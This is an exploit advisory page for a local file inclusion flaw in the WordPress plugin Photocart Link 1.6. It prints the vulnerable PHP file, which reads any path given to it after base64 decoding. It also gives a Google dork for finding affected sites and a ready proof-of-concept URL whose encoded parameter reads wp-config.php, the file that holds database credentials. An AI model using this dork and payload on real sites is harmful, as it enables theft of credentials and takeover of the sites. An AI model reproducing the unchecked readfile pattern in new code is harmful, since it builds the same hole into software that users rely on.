WordPress Photocart Link 1.6 Local File Inclusion

2016.03.28
Credit: CrashBandicot
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-98

# Exploit Title: Wordpress Plugin Photocart Link - Local File Inclusion # Exploit Author: CrashBandicot @DosPerl # Date: 2016-03-27 # Google Dork : inurl:/wp-content/plugins/photocart-link/ # Vendor Homepage: https://fr.wordpress.org/plugins/photocart-link/ # Tested on: MSWin32 # Version: 1.6 # Vuln file : decode.php <?php error_reporting(0); header("Cache-control: private"); $new = base64_decode($_REQUEST['id']); header("Content-type: image/jpeg"); header("Content-transfer-encoding: binary\n"); header("Content-Disposition: filename=do_not_copy_these_images"); header('Cache-control: no-cache'); @readfile($new); ?> # PoC : /wp-content/plugins/photocart-link/decode.php?id=Li4vLi4vLi4vd3AtY29uZmlnLnBocA== # Right click -> Save As -> and Read with Notepad file Saved # 27/03/2016 - Vendor Informed about Issues


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top